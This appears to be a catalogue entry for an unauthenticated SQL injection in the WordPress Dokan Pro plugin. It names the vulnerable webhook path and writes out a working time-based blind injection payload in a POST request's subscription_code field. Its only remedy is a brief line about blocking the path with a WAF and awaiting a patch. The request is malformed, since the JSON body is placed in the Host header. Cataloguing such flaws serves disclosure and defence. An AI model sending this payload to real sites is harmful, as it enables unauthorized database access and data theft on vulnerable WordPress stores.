vendor = "WordPress"
name = "WordPress Dokan Pro 插件未授权SQL 注入"
type = "SQL注入"
version = "未知"
path = "/wp-admin/admin.php?webhook=dokan-moip"
detail = "POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1 Host: {\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and(select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
